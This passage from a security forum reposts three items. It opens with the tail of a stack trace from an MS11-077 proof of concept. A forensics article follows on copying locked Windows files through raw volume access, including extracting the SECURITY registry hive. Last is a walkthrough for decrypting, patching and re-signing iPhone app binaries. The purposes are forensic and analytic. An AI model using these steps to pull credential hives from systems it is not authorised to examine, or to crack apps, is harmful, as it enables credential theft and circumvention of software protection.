0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
0012fff0 00000000 kernel32!BaseProcessStart+0x23

Sursa: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
  24. How to acquire "locked" files from a running Windows system

By Par Osterberg Medina. Tuesday, October 25, 2011

Windows systems offer a variety of special files that contain important pieces of information that are useful in a forensic investigation. Some obvious examples include pagefile.sys, the event logs, the registry hives, and NTFS-specific files such as the Master File Table ($MFT). It is a common misconception among forensic investigators and incident responders that collecting these special files from a live system is cumbersome and impossible to do via the command line. In this blog post I will show a couple of different ways to bypass the protection mechanism that Windows holds on these files. Without this hold, it becomes possible to acquire these files from a running system.

You have most likely found yourself in the situation where you wanted to copy a file from a running Windows system, only to be greeted with the infamous "File in Use" dialog box. This is Windows' way of ensuring that the file is not changed by another process while we are copying it, so that we're not left with a distorted version. For the copy operation to succeed we need to communicate directly with the hard drive of the system. This may be accomplished by referring to the volume that the file resides on using Win32 device namespaces, also called "DOS Devices".

Win32 Device Namespace

By using the "\\.\" prefix we access the Win32 device namespace (or NamedPipe) instead of the Win32 file namespace, which gives us direct access to physical disks and volumes without enforcing Windows file protections. In order to illustrate how the process is carried out I will use a tool from Microsoft called 'nfi' (NTFS File Sector Information Utility).

Identifying Sector Addresses

This particular tool is included in the OEM Support Tools for NT 4.0 and Windows 2000 and was originally released June 23, 2000. 'nfi' will query the NTFS file system for information regarding a file or a specific sector address in the file system. A sector is the smallest building block on a hard drive and its size is set by the drive manufacturer. One important piece of information that 'nfi' gives us is the addresses of the sectors of the file we want to acquire. In the following example, using a 64-bit version of Windows 7, we will first create a file (foundstone.txt) and then view its NTFS properties using 'nfi':

C:\>ver
Microsoft Windows [Version 6.1.7601]

C:\>FOR /L %i IN (1,1,20) DO @echo data data data data data data >> c:\foundstone.txt

C:\>nfi.exe c:\foundstone.txt
NTFS File Sector Information Utility.
Copyright (C) Microsoft Corporation 1999. All rights reserved.

\foundstone.txt
    $STANDARD_INFORMATION (resident)
    $FILE_NAME (resident)
    $FILE_NAME (resident)
    $DATA (nonresident)
        logical sectors 7357616-7357623 (0x7044b0-0x7044b7)

Notice the last line: it tells us that foundstone.txt is located on logical sectors 7357616-7357623. With this information we can carve the file out of the file system, a technique commonly referred to as "disk carving" that is used quite extensively in computer forensics.

Disk Carving

The tool of choice for disk carving is 'dd', the "Swiss army knife" of disk-based forensics. In this example I will be using the version of 'dd' that is included in the Forensic Acquisition Utilities (FAU) written by George M. Garner Jr. First we need to specify the Win32 device namespace of our volume as the input file ("if") and the size of our sectors as the block size ("bs").
We also need to specify where on the volume we want to start carving (“skip”) and how many sectors we want to process (“count”). The option ‘conv=noerror’ tells the program no to stop its operation if it encounter any errors. Below we’ve also piped the output into hexdump so it’s a little easier to read. C:\>dd.exe if=\\.\c: skip=7357616 bs=512 count=8 conv=noerror |hexdump 0000000: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000010: 6174 6120 6461 7461 2064 6174 6120 0a64 ata data data .d 0000020: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000030: 7461 2064 6174 6120 6461 7461 200a 6461 ta data data .da 0000040: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000050: 6120 6461 7461 2064 6174 6120 0a64 6174 a data data .dat 0000060: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000070: 2064 6174 6120 6461 7461 200a 6461 7461 data data .data 0000080: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 0000090: 6461 7461 2064 6174 6120 0a64 6174 6120 data data .data 00000a0: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 00000b0: 6174 6120 6461 7461 200a 6461 7461 2064 ata data .data d 00000c0: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 00000d0: 7461 2064 6174 6120 0a64 6174 6120 6461 ta data .data da 00000e0: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 00000f0: 6120 6461 7461 200a 6461 7461 2064 6174 a data .data dat 0000100: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000110: 2064 6174 6120 0a64 6174 6120 6461 7461 data .data data 0000120: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 0000130: 6461 7461 200a 6461 7461 2064 6174 6120 data .data data 0000140: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000150: 6174 6120 0a64 6174 6120 6461 7461 2064 ata .data data d 0000160: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000170: 7461 200a 6461 7461 2064 6174 6120 6461 ta .data data da 0000180: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000190: 6120 0a64 6174 6120 6461 7461 2064 6174 a .data data dat 00001a0: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 00001b0: 200a 6461 7461 2064 6174 6120 6461 7461 .data data data 00001c0: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 00001d0: 0a64 6174 6120 6461 7461 2064 6174 6120 .data data data 00001e0: 6461 7461 2064 6174 6120 6461 7461 200a data data data . 00001f0: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000200: 6174 6120 6461 7461 2064 6174 6120 0a64 ata data data .d 0000210: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000220: 7461 2064 6174 6120 6461 7461 200a 6461 ta data data .da 0000230: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000240: 6120 6461 7461 2064 6174 6120 0a64 6174 a data data .dat 0000250: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000260: 2064 6174 6120 6461 7461 200a 0000 0000 data data ..... 0000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00002f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
0000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000310: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000320: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00003a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00003c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00003e0: 0000 0000 0000 0000 0000 0000 7275 653b ............rue;
00003f0: 7d3b 7362 5f67 683d 6675 6e63 7469 6f6e };sb_gh=function
0000400: 2829 7b72 6574 7572 6e20 6c6f 6361 7469 (){return locati
0000410: 6f6e 2e68 6173 687d 3b73 625f 7368 3d66 on.hash};sb_sh=f
0000420: 756e 6374 696f 6e28 6129 7b6c 6f63 6174 unction(a){locat
0000430: 696f 6e2e 6861 7368 3d61 7d3b 5f77 3d77 ion.hash=a};_w=w
0000440: 696e 646f 773b 5f64 3d64 6f63 756d 656e indow;_d=documen
0000450: 743b 7362 5f64 653d 5f64 2e64 6f63 756d t;sb_de=_d.docum
0000460: 656e 7445 6c65 6d65 6e74 3b73 625f 6965 entElement;sb_ie
0000470: 3d21 215f 772e 4163 7469 7665 584f 626a =!!_w.ActiveXObj

As you can see, data keeps being printed to stdout even after the data in our file has ended. The reason is that a file occupies sectors grouped together on an even boundary. This grouping of sectors is called a cluster, and the data we see after the end of the file is referred to as slack space: remnants of old files that used to occupy the same sectors that are now part of the clusters of our file. As a side note, and an interesting detail from a forensics standpoint, no timestamps are modified.

Using icat and ifind

Now that we know the basics of acquiring a file using the Win32 device namespace, let's look at a more automated method of doing so. Another way to get files off the system (without worrying about slack space at the end of the file and with no need to manually calculate where the clusters start and end) is to use the utilities 'ifind' and 'icat' from Brian Carrier's The Sleuth Kit. The Sleuth Kit, in my opinion, is the best and most flexible forensic toolkit available – and it's open source. Given the drive letter and the path to the file, 'ifind' will return the entry number the file has in the $MFT. While this number is referred to as an $MFT entry on NTFS, it's called an inode in UNIX-based file systems. In order for 'ifind' to work properly, the full path must be given UNIX style (forward slashes instead of backslashes and with no drive letter at the beginning of the path). In this example we will acquire the SECURITY registry hive from the running system, a file that is normally not accessible.

C:\>ifind.exe -V
The Sleuth Kit ver 3.2.3

C:\>ifind.exe -n /windows/system32/config/security \\.\c:
27392

By using the file's number in the $MFT as an argument to 'icat', we can easily carve the file out of the file system. The 'icat' program will take care of terminating the output where the file ends, but we need to redirect the output from stdout to wherever we want to store the file.

C:\>icat.exe \\.\c: 27392 > c:\security.bin

C:\>file.exe security.bin
security.bin; MS Windows registry file, NT/2000 or above

Now that we know how to bypass Windows file protection, the only thing that remains is to automate the procedure so that we can include the "locked" files in our live data acquisition phase. I was going to post my wrapper script around 'ifind' and 'icat', but when I did some research on the Internet I found a much better tool called 'ntfscopy'.

ntfscopy

The tool is written by Jonathan Tomczak from TZWorks LLC and does exactly what we have discussed above, plus more. You can download it from http://tzworks.net. Here are the options that 'ntfscopy' supports:

usage: copying by filename
ntfscopy.exe = live system
ntfscopy.exe -image [-offset ]
other options that can be used w/ the above
-raw = output raw clusters including slack space
-meta = pull out metadata into separate file [.meta.txt]
-skip_sparse_clusters = don't include sparse clusters in the output
-md5 = prepends last mod time to filename and appends md5 hash
experimental options
a. copying by logical cluster number (LCN)
ntfscopy.exe -partition -cluster
ntfscopy.exe -image [-offset ] -cluster
b. copying from a VMWare virtual NTFS drive (limited)
ntfscopy.exe -vmdk [-vmdk ]
c. piping in which files to copy
dir \* /b /s | ntfscopy.exe -pipe -md5

Here is an example of using 'ntfscopy' to acquire a copy of the $MFT from a live Windows system.

C:\>ntfscopy.exe c:\$MFT c:\copy_of_MFT
ntfscopy ver: 0.65, Copyright (c) TZWorks LLC
copy successful

Forensic Get

Another tool that will get the job done is FGET, or Forensic Get, from HBGary, Inc. The program can not only acquire "locked" files from a local file system, but also supports over-the-network operations. FGET and other free tools from HBGary can be downloaded from http://hbgary.com/free-tools. Below is an example of using FGET to acquire a copy of the $Mft.

C:\>FGET.exe -extract c:\$Mft c:\copy_of_Mft2.bin
-= FGET v1.0 - Forensic Data Acquisition Utility - (c)HBGary, Inc 2010 =-
[+] Extracting File From Volume ...SUCCESS!

By using 'ntfscopy' or any of the other methods described above, forensic examiners and incident responders can now acquire protected files through a command line interface. Examples of how we can put everything together and automate it will be explained in part II of this blog post.

Bio

Par Osterberg Medina has worked with computer security for over 15 years, with a background in both system administration and penetration testing. Prior to joining Foundstone, Par spent the last 8 years working as an Incident Handler for the Swedish GovCERT, investigating computer intrusions and coordinating security related incidents. He specializes in Malware Analysis and Memory Forensics, finding rootkits that try to stay hidden in the operating system. He has conducted training and lectured on this subject all over the world at conferences such as FIRST and The GOVCERT.NL Symposium.

Sursa: http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html
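As a quick aside to the article above, the raw-volume read that 'dd' performs in the disk carving example can be reproduced in a few lines of Python. This is only a sketch, assuming an elevated command prompt on Windows and the sector numbers that 'nfi' reported for foundstone.txt; like 'dd' it copies whole sectors, so it keeps slack space rather than trimming it the way 'icat' does.

# Sketch: carve sectors straight off \\.\C:, like the dd example above.
# Run as Administrator; raw volume reads must be sector-aligned, hence
# buffering=0 and whole-sector offsets and sizes.
SECTOR = 512

def carve(volume, first_sector, count, out_path):
    with open(volume, "rb", buffering=0) as vol, open(out_path, "wb") as out:
        vol.seek(first_sector * SECTOR)       # jump to the first logical sector
        out.write(vol.read(count * SECTOR))   # read whole sectors, slack included

if __name__ == "__main__":
    # foundstone.txt occupied logical sectors 7357616-7357623 (8 sectors).
    carve(r"\\.\C:", 7357616, 8, "foundstone_carved.bin")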
  25. Decrypting iPhone Apps

saurabh @ 13:57

This blog post steps through how to convert encrypted iPhone application bundles into plaintext application bundles that are easier to analyse.

Requirements:
1) Jailbroken iPhone with OpenSSH, gdb plus other utilities (com.ericasadun.utilities etc.)
2) An iPhone app
3) On your machine: otool (comes with the iPhone SDK), a hex editor (0xED, HexWorkshop etc.), and IDA - versions 5.2 through 5.6 support remote debugging of iPhone applications (iphone_server).

For this article, I will use "blah" as the app name.

Some groundwork, taken from Apple's API docs [1, 2]: iPhone apps use the Mach-O (Mach Object) file format. A Mach-O file contains three major regions:

1. At the beginning of every Mach-O file is a header structure that identifies the file as a Mach-O file. The header also contains other basic file type information, indicates the target architecture, and contains flags specifying options that affect the interpretation of the rest of the file.
2. Directly following the header are a series of variable-size load commands that specify the layout and linkage characteristics of the file. Among other information, the load commands can specify: the initial layout of the file in virtual memory; the location of the symbol table (used for dynamic linking); the initial execution state of the main thread of the program; and the names of shared libraries that contain definitions for the main executable's imported symbols.
3. Following the load commands, all Mach-O files contain the data of one or more segments. Each segment contains zero or more sections, and each section of a segment contains code or data of some particular type. Each segment defines a region of virtual memory that the dynamic linker maps into the address space of the process. The exact number and layout of segments and sections is specified by the load commands and the file type.
4. In user-level fully linked Mach-O files, the last segment is the link edit segment. This segment contains the tables of link edit information, such as the symbol table, string table, and so forth, used by the dynamic loader to link an executable file or Mach-O bundle to its dependent libraries.

iPhone apps are normally encrypted and are decrypted by the loader at run time. One of the load commands is responsible for decrypting the executable.

Once you have downloaded and installed an app on your iPhone, make a copy of the actual executable on your machine.

Note 1: blah.app is not the actual executable. If you browse this folder, you will find a binary file named blah. This is the actual application binary.

Note 2: To find the path where your application is installed, ssh onto your iPhone and use the following command:

sudo find / | grep blah.app

Once you have copied the app binary onto your machine, follow the steps below (on your local machine). Open up a terminal and type the following command:

otool -l blah | grep crypt

This assumes that the iPhone SDK, or at least otool, is already installed on your machine. The command prints the crypt fields of the binary. If cryptid is set to 1, the app is encrypted; cryptoff and cryptsize indicate the offset and size of the encrypted section, respectively.

Now, first we have to locate the cryptid in the binary and set it to zero. This is done so that when we finally decrypt the binary and execute it on the iPhone, the loader does not attempt to decrypt it again.

Open the binary in a hex editor. I did not come across any definite method of locating the cryptid. Once you have loaded the binary in a hex editor, search for "/System/Library/Frameworks". You should be able to locate it around address 0x1000. In the line just above the very first instance of this string (/System/Library/Frameworks), you will find the byte 01. Flip it to 00 and save the file.

Note 3: In case you find multiple instances of 01, use the coin-tossing method of choosing between them.

Use otool again to query the crypt data. You will see that cryptid is now set to 0 (zero). Next, we need to run the app installed on the iPhone and take a memory dump.

Note 4: The actual application code starts at 0x2000. The cryptsize in the case of our sample app is 942080 (0xE6000). Hence, we add 0x2000 and 0xE6000: 0x2000 + 0xE6000 = 0xE8000. Therefore, we need to dump the running process from 0x2000 to 0xE8000.

Now, ssh onto your iPhone, run the target app and look for the process id using the "ps -ax" command. Once you have the process id, use the following commands to dump the process:

gdb -p PID
dump memory blah.bin 0x2000 0xE8000

Once you have taken the memory dump, use the "quit" command to exit gdb. Use the following command to get the size of the memory dump:

ls -l blah.bin

The size of this bin file should be exactly the same as the cryptsize of the original app. Now pull this bin file onto your local machine.

On your local machine, load the bin file in a hex editor and copy everything (using select all or whatever). Close the file and open the original app in the hex editor (the file in which we modified the cryptid from 01 to 00). If you remember, the cryptoff was 4096, which is 0x1000 in hex. Proceed to address 0x1000 and make sure that your hex editor is in overwrite mode, not in append mode. Once you are at address 0x1000, paste everything you copied from the bin file. This will overwrite the encrypted section with the decrypted one. Save the file and you're done.

Open the file in IDA Pro and you'll see the difference between the encrypted and decrypted binaries. At this point, you can easily reverse engineer the app and patch it. (In the original post, one screenshot shows an encrypted app and a second one a decrypted app.)

After patching the application, ssh onto the iPhone and upload it to the application directory; this means replacing the original binary with the patched one. Once uploaded, install a utility called "ldid" on your iPhone:

apt-get install ldid

Finally, sign the patched binary using ldid:

ldid -s blah

This will fix the code signatures and you will be able to run the patched app on your iPhone.

References:
1) http://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html
2) http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html

Sursa: http://www.sensepost.com/blog/6254.html
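As a rough summary of the patching step above, the following Python sketch overwrites the encrypted region of the on-disk binary with the plaintext section dumped from memory, which is what the hex-editor copy-and-paste accomplishes. The file names and the offsets (cryptoff 0x1000, cryptsize 0xE6000) are the ones used for the sample app in this walkthrough; substitute the values otool reports for your own binary.

# Sketch: splice the decrypted section (gdb dump of 0x2000-0xE8000) back
# over the encrypted region of the binary whose cryptid was zeroed earlier.
CRYPTOFF  = 0x1000     # cryptoff reported by otool for the sample app
CRYPTSIZE = 0xE6000    # cryptsize reported by otool (942080 bytes)

with open("blah.bin", "rb") as f:           # memory dump taken with gdb
    decrypted = f.read()
assert len(decrypted) == CRYPTSIZE, "dump size must equal cryptsize"

with open("blah", "rb") as f:               # original binary, cryptid already set to 0
    patched = bytearray(f.read())

patched[CRYPTOFF:CRYPTOFF + CRYPTSIZE] = decrypted  # overwrite encrypted region

with open("blah.decrypted", "wb") as f:     # re-sign with 'ldid -s' before running
    f.write(patched)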